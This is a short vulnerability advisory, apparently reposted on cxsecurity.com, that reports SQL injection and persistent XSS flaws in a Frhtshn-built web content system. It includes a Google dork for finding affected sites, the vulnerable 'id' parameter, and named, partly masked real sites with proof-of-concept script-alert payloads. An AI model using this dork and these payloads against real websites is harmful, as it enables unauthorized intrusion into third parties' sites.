Frhtshn SQL Injection / Cross Site Scripting

2012.04.04
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 1 0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 ========================================================================== <<<:>>> Frhtshn - SQLi/XSS Multiple Vulnerability <<:>>> ========================================================================== - Discovered By: ||| TheCyberNuxbie - Independent Security Research ||| <<< staff@thecybernuxbie.com >>> CP: +62856-2538-963 [ www.thecybernuxbie.com ] $ YM: nux_exploit - Info WebApps: This Content Develop By Frhtshn: http://www.frhtshn.com/ - Google Dork: intext:"Design & Development by frhtshn" - Exploit Concept: http://lokalisasi/?i=icerik_goster.php&id=[SQL Injection] http://lokalisasi/?i=icerik_goster.php&id=[XSS] - Sample Web SQL Injection Vulnerability: http://www.tipxxom.tr/?i=icerik_goster.php&id=42' + [SQL Injection] http://www.arxxltd.com.tr/?i=icerik_goster.php&id=40' + [SQL Injection] http://www.axxcom.tr/?i=icerik_goster.php&id=25' + [SQL Injection] http://www.tirixxxcom.tr/?i=icerik_goster.php&id=5' + [SQL Injection] - Sample Web Persistent XSS Vulnerability: http://www.tipor.com.tr/?i=icerik_goster.php&id=<script>alert(31337);</script> <:- [XSS] http://www.argonltd.com.tr/?i=icerik_goster.php&id=<script>alert(31337);</script> <:- [XSS] http://www.anios.com.tr/?i=icerik_goster.php&id=<script>alert(31337);</script> <:- [XSS] http://www.tiritoglu.com.tr/?i=icerik_goster.php&id=<script>alert(31337);</script> <:- [XSS] -:>>> Special Thanks <<<:- ...:::' 1337day Inj3ct0r TEAM ':::... [ All Staff & 31337 Member Inj3ct0r TEAM ] , And All Inj3ct0r Fans & All Hacktivist,,, :-) ######################################################################### [ Inj3ct0r | PacketStromSecurity | Exploit-DB | Exploit-ID | Devilzc0de ] #########################################################################

References:

http://www.frhtshn.com/
http://www.1337day.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top